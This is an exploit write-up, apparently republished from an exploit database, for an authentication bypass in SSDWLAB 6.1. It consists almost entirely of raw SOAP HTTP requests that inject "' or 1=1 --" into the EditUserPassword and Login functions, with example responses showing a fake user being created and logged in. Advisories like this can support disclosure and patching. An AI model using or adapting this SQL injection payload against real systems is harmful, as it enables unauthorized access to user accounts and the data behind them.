SSDWLAB 6.1 – Authentication Bypass

– Exploit Details

# Exploit Title: SSDWLAB 6.1 - Authentication Bypass
# Date: 2019-10-01
# Exploit Author: Luis Buendía (exoticpayloads)
# Vendor Homepage: //www.sbpsoftware.com/
# Version: 6.1
# Tested on: IIS 7.5
# CVE : Pending
#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it.

Request to the EditUserPassword Function

POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
Content-Type: text/xml; charset=utf-8
Content-Length: 462
SOAPAction: "//tempuri.org/EditUserPassword"



  
    
      ' or 1=1 --
      string
      string
      ENG
    
  




Example of Response when injection is succesfull

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Content-Length: 421

0



Request to Login After Successful Request

POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: //XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[DYNAMIC]/2
Content-Type: text/xml; charset=utf-8
SOAPAction: "//tempuri.org/Login"
Content-Length: 406


  
    
      ' or 1=1 --
      string
      ENG
    
  




Example of succesfull login

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Connection: close
Content-Length: 422

0d62cc3c0b2e3413cb8b4a85b0fa6177b
            

.




TAGS
Share This

COMMENTS

Wordpress (0)
Disqus ( )